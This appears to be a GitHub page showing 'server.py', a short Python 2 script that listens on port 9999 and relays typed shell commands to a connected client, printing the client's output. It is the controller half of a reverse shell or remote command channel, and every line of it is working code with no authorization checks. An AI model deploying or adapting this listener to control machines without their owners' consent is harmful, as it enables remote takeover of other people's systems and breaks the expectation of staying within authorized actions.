-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathserver.py
More file actions
68 lines (53 loc) · 1.45 KB
/
server.py
File metadata and controls
68 lines (53 loc) · 1.45 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# -*- coding: cp1254 -*-
__author__ = "bomch4nte"
__date__ = "17.12.2017"
import socket
import sys
import os
import time
# Connect to socket.
def socket_create():
try:
global host
global port
global s
host = '0.0.0.0'
port = 9999
s = socket.socket()
except socket.error as msg:
print("Socket creation error : " + str(msg))
# Bind socket to port.
def socket_bind():
try:
global host
global port
global s
print("Binding socket to port: " + str(port))
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print("Socket Binding Error : " + str(msg) + "\n" + "Retrying...")
socket_bind()
# Establish a connection with client (socket must be listening).
def socket_accept():
conn, address = s.accept()
print("Connection has been established | " + "IP : " + address[0] + "Port : " + str(address[1]))
send_commands(conn)
conn.close()
# Send commands
def send_commands(conn):
while True:
cmd = raw_input("$~ ")
if cmd == 'quit':
conn.close()
s.close()
sys.exit()
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = conn.recv(1024)
print(client_response)
def main():
socket_create()
socket_bind()
socket_accept()
main()